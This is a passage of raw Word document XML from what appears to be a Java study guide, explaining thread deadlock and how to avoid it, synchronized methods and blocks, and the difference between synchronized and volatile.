      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> acquires lock1 and then waits for lock2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6554606C"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2</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> acquires lock2 and then waits for lock1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71040BF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Now, Thread 1 holds lock1 and waits for lock2, and at the same time, Thread 2 holds lock2 and waits for lock1. Both threads are stuck, each waiting for the other to release a lock. As a result, neither thread can proceed, leading to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434CD34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Output of the Above Program:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755354D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Holding lock1...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EA9F7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Holding lock2...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF4464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Waiting for lock2...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653A39B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Waiting for lock1...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C5D70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The program will hang here indefinitely because Thread 1 is waiting for lock2 and Thread 2 is waiting for lock1. Neither will release the locks they hold, resulting in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11D64F48"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How to Avoid Deadlock?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AC31A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Here are some ways to prevent or avoid deadlocks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FAC6B7"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Lock Ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that all threads acquire the locks in the same order. For example, always acquire lock1 first, then lock2, for all threads, to avoid circular waits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A6208A"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imeouts</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Set timeouts when trying to acquire locks. If a thread can't acquire the necessary locks within a specified time, it releases all the locks it holds and tries again, avoiding deadlock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343B219B"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 Detection</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Monitor the system to detect deadlocks. If a deadlock is detected, break the cycle of dependency and allow threads to continue executing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B84F81F"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Using tryLock() (from ReentrantLock)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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1 = new ReentrantLock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1873EA3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2 = new ReentrantLock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ED9D9F" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03C49B7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if (lock1.tryLock() &amp;&amp; lock2.tryLock()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288D726F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556BE1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Critical section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B1B335"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finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A34CCDA"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1.unlock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A37D72"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2.unlock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691045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304227E0"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75009875"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lastRenderedPageBreak/>
        <w:t>Avoiding Nested Locks</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Try to avoid situations where a thread needs to acquire multiple locks. If multiple locks are necessary, ensure they are acquired in a consistent and predictable order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E5C9C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clusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347A81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6" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B39BDF5"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73" w:name="_Toc197867487"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a Synchronized Thread?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="273"/>
    </w:p>
    <w:p w14:paraId="1CF4AD0A" w14:textId="04C67095" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronized thread</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java refers to a thread that is executing a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> block of code or method. Synchronization in Java is a mechanism that ensures that a particular section of code can only be accessed by one thread at a time. This is crucial in multithreaded environments to prevent </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>race conditions</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and ensure data consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719F267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en multiple threads access shared resources (like variables, objects, etc.), they can sometimes cause data inconsistency or unexpected behavior due to concurrent access. To solve this issue, we can </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronize</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the critical section of code, ensuring that only one thread can execute that part of the code at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01943253"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How Synchronization Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5B548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Java provides two ways to synchronize threads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C65F44"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A block of code inside a method can be synchronized. This is used when you need finer control over synchronization, for example, when only a part of the method should be synchronized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4674968C"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Method Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C05A4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method ensures that only one thread can execute it at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5531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1E5D0E4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72F8C99F" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D5BDC2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ynchronized method to ensure only one thread can access it at a time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581AE7F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ynchronized void increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B42CAD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6C6CBCE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2989EA0" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="540A216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23AFB4D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26B8BEA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87792E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3E4C1152" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="074149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6EA82EB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451498E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423A3314" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DC64E5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4BB87C2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7F7EE8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2BCF41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5EC3F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3347B1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05FE02A" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59279E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5FE716B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3F5E401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1DCDB09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6FD2C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9B390FE" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28CE4B3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1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D279EB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start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4400E5B7" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7179746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5B733B8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6EBEA49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22BD482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5286514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05E9828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A40B461" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F54D07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03CD6BC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7AAC53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01BE85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09AD0B3B"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4E947DB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 increment() method is synchronized. This means that even if multiple threads (t1 and t2) call the increment() method, only one thread will be able to execute it at any given time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A6F666"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out synchronization, both threads might update the count variable simultaneously, leading to incorrect results due to race conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D476DA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 synchronization, the count will be correctly incremented by each thread, and the final value of count will be 2000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6845E419"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Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4C83D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block allows you to synchronize only a part of the method, which can be more efficient than synchronizing the whole method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6B03D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6A7EE0B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207F9A55" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A507E2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increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D047EC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nchronized (this) {  // Synchronize only the critical section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107F6AC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032F7A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F7F5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30ECD8A" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49F023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1C8C66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514A6B1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EFAE5B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A4C46B8" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B41F07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7BB3B7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897D17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334B6406" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E4910F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041BFAC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4071005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A278F4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AAF958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08C2A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04211DC6" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="057FEDF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17D86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63C96A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410534A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C124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FB1D45D" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="542CC5D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start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AE523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2.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E961ADF" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F91AA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324C0FF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2B0CA3D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1EF70CC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06B32B8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2299BB1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EAAAA5B" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="745658D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2F9A628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50C3BB9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FFD60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4C2023D"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71DCAD35"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The increment() method contains a </w:t>
      </w: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The synchronized (this) block ensures that only one thread can increment the count at a time, while the rest of the method remains unsynchronized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EDBC4C"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can lead to better performance because it minimizes the time spent holding the lock compared to synchronizing the entire method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705D74C4"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vs. Synchronized Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C557625"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Easier to use, and locks the entire method, which may be inefficient if you need to synchronize only a small part of the method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A2357F"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More flexible, as it allows you to synchronize only specific critical sections of your code, which may improve performance if the synchronized portion is small.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEB0AA0"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Advantages of Synchronization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66036C85"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ata Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Synchronization ensures that shared data is not accessed by multiple threads simultaneously, avoiding data corruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6726B3"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Safety</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It provides a way to achieve thread safety by preventing race conditions in concurrent programming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C446896"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Disadvantages of Synchronization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376D07E0"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Performance Overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Acquiring and releasing locks introduces overhead, which may degrade performance, especially in highly concurrent applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD3FDDB"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eadlock</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Improper use of synchronization may lead to deadlocks if threads acquire locks in an inconsistent order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBEA077"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Contention</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Multiple threads waiting for the same lock can lead to thread contention, affecting performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1EA9E7"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nclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6268F75B" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00CE4B95" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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7" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F7236B" w14:textId="756CC497" w:rsidR="008A25EB" w:rsidRPr="00CE4B95" w:rsidRDefault="00C836C6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="274" w:name="_Toc197867488"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between synchronized and volatile keyword</w:t>
      </w:r>
      <w:r w:rsidR="008A25EB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="274"/>
    </w:p>
    <w:p w14:paraId="36558F39" w14:textId="72E3742A" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF"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Both the synchronized and volatile keywords are used in Java to manage concurrency and thread safety, but they serve different purposes and have different behaviors. Here's a comparison between the two:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6455C0"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1. Purpose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233A6AA3"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1319B86C"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synchronized keyword is used to ensure that only one thread can access a method or block of code at a time. It is used to manage access to shared resources and prevent </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>race conditions</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It guarantees mutual exclusion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC4CC77"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4E4EB25"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volatile keyword is used to indicate that a variable's value may be changed by multiple threads. It ensures that updates to a variable are visible to all threads, providing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guarantees.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provide mutual exclusion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1D8BDC"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2. Thread Safety:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518B5136"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68B759BC"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Provides </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mutual exclusion</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. When a method or block is synchronized, only one thread can execute it at a time. It ensur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the code block inside the synchronized method is executed completely without interruption).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFA6852"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D8108A1"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t xml:space="preserve">Provides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but does not ensure mutual exclusion. A volatile variable ensures that changes to the variable are immediately visible to all threads. However,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guarantee atomicity for compound operations (like i++).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A34BF1D"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3. Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44947EF8"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FD7DC38"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control access to a shared resource (like a method or block of code) to ensure that only one thread can modify it at a time.</w:t>
      </w:r>
